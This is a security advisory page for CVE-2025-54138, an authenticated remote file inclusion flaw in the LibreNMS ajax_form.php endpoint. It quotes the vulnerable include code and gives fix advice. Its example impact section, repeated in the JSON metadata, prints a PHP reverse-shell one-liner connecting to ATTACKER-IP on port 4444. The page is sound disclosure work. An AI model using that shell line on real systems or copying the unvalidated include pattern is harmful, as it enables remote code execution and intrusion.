ghsa-gq96-8w38-hhj2
Vulnerability from github
Published
2025-07-21 21:10
Modified
2025-07-23 13:37
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
LibreNMS has Authenticated Remote File Inclusion in ajax_form.php that Allows RCE
Details

LibreNMS 25.6.0 contains an architectural vulnerability in the ajax_form.php endpoint that permits Remote File Inclusion based on user-controlled POST input.

The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting:

php if (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) { include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php'; } This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities.

This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.

Conditions for Exploitation

  • Attacker must be authenticated
  • Attacker must control a file at includes/html/forms/{type}.inc.php (or symlink)

Example Impact (RCE)

If a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the librenms user context:

```php

& /dev/tcp/ATTACKER-IP/4444 0>&1"'); ?>

``` https://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812

Recommended Fix

  • Implement strict allow listing or hardcoded routing instead of dynamically including user-supplied filenames.
  • Avoid passing raw POST input into include_once.
  • Ensure the inclusion path is immutable and outside attacker control (e.g., avoid variable expansion into trusted paths).
Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "librenms/librenms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "25.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54138"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-98"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-21T21:10:51Z",
    "nvd_published_at": "2025-07-22T22:15:38Z",
    "severity": "HIGH"
  },
  "details": "LibreNMS 25.6.0 contains an architectural vulnerability in the `ajax_form.php` endpoint that permits Remote File Inclusion based on user-controlled POST input. \n\nThe application directly uses the `type` parameter to dynamically include `.inc.php` files from the trusted path `includes/html/forms/`, without validation or allowlisting:\n\n```php\nif (file_exists(\u0027includes/html/forms/\u0027 . $_POST[\u0027type\u0027] . \u0027.inc.php\u0027)) {\n    include_once \u0027includes/html/forms/\u0027 . $_POST[\u0027type\u0027] . \u0027.inc.php\u0027;\n}\n```\nThis pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path \u2014 for example, via symlink, development misconfiguration, or chained vulnerabilities.\n\n\u003e  This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.\n\n# Conditions for Exploitation\n\n- Attacker must be authenticated    \n- Attacker must control a file at `includes/html/forms/{type}.inc.php` (or symlink)        \n\n# Example Impact (RCE)\n\nIf a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the `librenms` user context:\n\n```php\n\u003c?php system(\u0027/bin/bash -c \"bash -i \u003e\u0026 /dev/tcp/ATTACKER-IP/4444 0\u003e\u00261\"\u0027); ?\u003e\n```\nhttps://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812\n\n\n---\n\n# Recommended Fix\n\n- Implement strict allow listing or hardcoded routing instead of dynamically including user-supplied filenames. \n- Avoid passing raw POST input into `include_once`.\n- Ensure the inclusion path is immutable and outside attacker control (e.g., avoid variable expansion into trusted paths).",
  "id": "GHSA-gq96-8w38-hhj2",
  "modified": "2025-07-23T13:37:00Z",
  "published": "2025-07-21T21:10:51Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54138"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/pull/17990"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/commit/ec89714d929ef0cf2321957ed9198b0f18396c81"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/librenms/librenms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/releases/tag/25.7.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LibreNMS has Authenticated Remote File Inclusion in ajax_form.php that Allows RCE"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.